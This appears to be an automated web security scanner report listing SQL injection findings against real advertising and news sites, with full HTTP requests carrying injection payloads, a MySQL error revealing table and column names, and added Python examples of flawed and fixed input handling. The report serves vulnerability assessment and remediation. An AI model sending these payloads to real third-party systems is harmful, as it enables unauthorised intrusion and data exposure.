Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:01:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3049

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
or%2520attorneys%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8%2527%2527&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:01:21 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2911

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [region parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The region parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that, as with the oe parameter in 1.10, neither response below contains an error message: both are HTTP 200 responses carrying ad JavaScript, differing only in length (3029 versus 3639 bytes) and in the ad served, which changes between requests to this endpoint anyway. Treat this Tentative finding as unconfirmed unless an actual error can be reproduced.

The scanner reports that the application attempts to block SQL injection attacks but that this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The web server decodes %2527 once, to %27; only a second, application-level decode would turn it into a literal quote. No block is visible in the responses, so this inference rests on the probe alone.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the region request parameter, as the web server will already have carried out one decode; a second decode is exactly what turns %2527 into a literal quote after validation has run on the once-decoded value. If the application does need custom canonicalisation (a further decode, case folding, Unicode normalisation), it must perform all of it first and validate the final canonical form. Filtering quote characters is in any case not a substitute for parameterised queries.
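
The ordering problem this remediation describes, shown as an added example for both 1.10 and 1.11 (Python written for this report, not code from the scanner or from the ad server, whose implementation is not visible): app_vulnerable validates the once-decoded value and then decodes again, so %2527 passes the quote check and reaches the query as a literal quote; app_fixed canonicalises first. The block-list on a single quote is the scanner's hypothesis about the server and is assumed here only to show the effect of ordering.

```python
from urllib.parse import unquote

# Added example, not from the scanner report. The quote block-list is an
# assumption about the target; the ordering effect it demonstrates is general.

BLOCKED = "'"


def server_decode(raw_query_value):
    """The web server decodes the query string once: %2527 -> %27, %27 -> '."""
    return unquote(raw_query_value)


def app_vulnerable(raw_query_value):
    """Broken order: validate the once-decoded value, then decode again."""
    value = server_decode(raw_query_value)
    if BLOCKED in value:
        raise ValueError("rejected: quote in %r" % value)
    value = unquote(value)          # second, application-level decode
    return value                    # this is what reaches the query


def app_fixed(raw_query_value):
    """Correct order: finish all canonicalisation, then validate the result."""
    value = server_decode(raw_query_value)
    value = unquote(value)          # if a second decode is really needed, do it here
    if BLOCKED in value:
        raise ValueError("rejected: quote in %r" % value)
    return value


def outcome(app, raw_query_value):
    """'accepted:<value used in the query>' or 'rejected'."""
    try:
        return "accepted:" + app(raw_query_value)
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    for raw in ("utf8", "utf8%27", "utf8%2527"):
        print(raw, "->", outcome(app_vulnerable, raw), "|", outcome(app_fixed, raw))
```

Run stand-alone, the script shows utf8%27 rejected by both versions while utf8%2527 is accepted by app_vulnerable as utf8' and rejected by app_fixed. The deeper fix is to stop caring which characters arrive: bind the value as a query parameter and the decode order stops being security-relevant.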

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2%2527&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:00:09 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3029

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
20clinic%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Malibu Luxury Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fco
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2%2527%2527&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:00:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3639

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that both responses below are HTTP 200 responses carrying ad JavaScript with no error message; they differ only in length (2983 versus 3278 bytes) and in the ad served, as responses from this endpoint do on every request. u_w carries the browser's screen width (1920 here), so the expected server-side handling is to accept it only as an integer. This probe used a raw quote (1920') rather than the double-encoded form used in 1.10 and 1.11. Treat this Tentative finding as unconfirmed unless an actual error can be reproduced.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:09:16 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2983

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
520professionals%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:09:17 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3278

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.13. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://pandora.cnet.com
Path:   /api/rest/ddaImageHandler/index.php

Issue detail

The fieldNum parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fieldNum parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL. The error text is informative in two ways. First, the submitted 3' appears in the failing statement as 3\', so the application does escape quotes (addslashes- or mysql_real_escape_string-style) before building the query. Second, the escaping did not help, because fieldNum is not placed inside a quoted string literal: it is appended to column names (img_binType3 is visible as ... img_binType3\' AS filetype ...), and backslash escaping has no meaning in an identifier position. Neither escaping nor bound parameters can protect an identifier; the value must be validated against a fixed allow-list of permitted column names (or parsed strictly as an integer) before it is used. The message also discloses the table name dda2_preview and the shape of the query, and shows the keyval parameter placed in a quoted literal (WHERE keyval='2n540...'), so that parameter warrants the same review.

Remediation detail

Restrict fieldNum to a known set of column suffixes before it reaches the query, bind keyval as a parameter, and handle errors gracefully so that SQL error messages are never returned in responses.

Request

GET /api/rest/ddaImageHandler/index.php?fieldNum=3'&fuseaction=download&keyval=2n540drqg0i_2 HTTP/1.1
Host: pandora.cnet.com
Proxy-Connection: keep-alive
Referer: http://i.i.com.com/cnwk.1d/Ads/7074/11/moneywatch_carousel_300x250.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:02:57 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=662e4b70fb17ef7022023939ad53f4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 394
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AS bin_data, img_binType3\' AS filetype FROM dda2_preview WHERE keyval='2n540' at line 1

<br>
...[SNIP]...
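
An added example of the identifier-position problem the error message reveals, and of the allow-list fix (Python written for this report, not code from cnet.com; SQLite stands in for the MySQL server so that it runs offline, the table and column names are taken from the error text, and the rest of the schema, the row and the set of allowed slots are constructed):

```python
import sqlite3

# Added example, not code from the report or from cnet.com. SQLite stands in
# for the MySQL server named in the error; dda2_preview, img_bin3/img_binType3
# and keyval come from the error text, everything else is constructed.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE dda2_preview (keyval TEXT, img_bin3 BLOB, img_binType3 TEXT)"
    )
    conn.execute(
        "INSERT INTO dda2_preview VALUES ('2n540drqg0i_2', X'89504E47', 'image/png')"
    )
    return conn


def escape_quotes(value):
    """addslashes()-style escaping, the kind that produced 3\\' in the error."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query_vulnerable(field_num):
    """Escapes the quote, then pastes the value into column *names*.

    Backslash escaping only means something inside a quoted string literal.
    In an identifier position the escaped quote is still a syntax error, and
    an unescaped value lets the caller name any column or table at all.
    """
    col = escape_quotes(field_num)
    return (
        "SELECT img_bin%s AS bin_data, img_binType%s AS filetype "
        "FROM dda2_preview WHERE keyval = ?" % (col, col)
    )


# Assumed set of image slots the handler really has; the true set is unknown.
ALLOWED_FIELD_NUMS = {"1", "2", "3"}


def build_query_safe(field_num):
    """Identifiers cannot be bound as parameters, so allow-list them instead;
    keyval stays a bound parameter in both versions."""
    if field_num not in ALLOWED_FIELD_NUMS:
        raise ValueError("fieldNum %r is not a known image slot" % field_num)
    return (
        "SELECT img_bin%s AS bin_data, img_binType%s AS filetype "
        "FROM dda2_preview WHERE keyval = ?" % (field_num, field_num)
    )


def probe(builder, field_num, keyval="2n540drqg0i_2"):
    """Run the built query; return 'ok', 'no_row', 'db_error' or 'rejected'."""
    conn = make_db()
    try:
        row = conn.execute(builder(field_num), (keyval,)).fetchone()
        return "ok" if row is not None else "no_row"
    except sqlite3.OperationalError:      # syntax error, as MySQL reported
        return "db_error"
    except ValueError:                    # allow-list refused the value
        return "rejected"
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("3", "3'"):
        print(repr(value), probe(build_query_vulnerable, value), probe(build_query_safe, value))
```

build_query_vulnerable("3'") produces ... img_binType3\' AS filetype ..., the same fragment MySQL echoed, and the database rejects it; build_query_safe refuses the value before any SQL is built. If the slots were numeric in the real handler, int(field_num) with a range check would do the same job.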

1.14. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/SiteLifeProxy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20467713'%20or%201%3d1--%20 and 20467713'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection flaws are prone to false positives, and this one should be read with that in mind. In the two responses captured below the bodies have the same length (102317 bytes) and the visible content is identical; every difference is in headers that change between requests anyway: the desmoinesprod cookie, the SiteLifeHost and anonId cookies set only in the first response, the Cache-Control max-age, the ETag, and the x-SiteLife-host backend name (gnvm25l3pluckcom versus gnvm11l3pluckcom). That pattern is consistent with the two requests having been served by different backend nodes, not with a SQL condition changing the result. Treat this as a probable false positive unless a body-level difference can be reproduced against the same backend.

Request 1

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d1--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: public, max-age=86400
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:07:23 GMT
Last-Modified: Mon, 14 Feb 2011 10:07:23 GMT
ETag: -726392143
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Set-Cookie: anonId=a1694d2b-4620-4b12-92ae-a550aea084e5; domain=desmoinesregister.com; expires=Tue, 14-Feb-2012 14:54:14 GMT; path=/
Date: Mon, 14 Feb 2011 14:54:14 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out d
...[SNIP]...

Request 2

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d2--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4081535073; path=/
Cache-Control: public, max-age=84015
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:34:37 GMT
Last-Modified: Mon, 14 Feb 2011 10:34:37 GMT
ETag: -1742467064
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm11l3pluckcom
Date: Mon, 14 Feb 2011 14:54:15 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out debug information through alert()
this.debug = false;

// used to track the id of the handler expecting the results from the immediately preceeding method invocation
// this is used only for test
...[SNIP]...

1.15. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection flaws are prone to false positives, and this one is weak. Both responses below are 204 No Content with empty bodies; they differ only in headers: the first carries P3P and Expires headers and sets the cd and dq cookies (dq going from 42|5|37|0 to 43|5|38|0), the second does not, and the Cache-Control values differ. Header differences of this kind are readily explained by server-side state such as the dq counter the first response increments, so there is no body-level evidence to support the finding. Treat it as unconfirmed unless repeated requests with each payload produce a consistent, payload-dependent difference.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
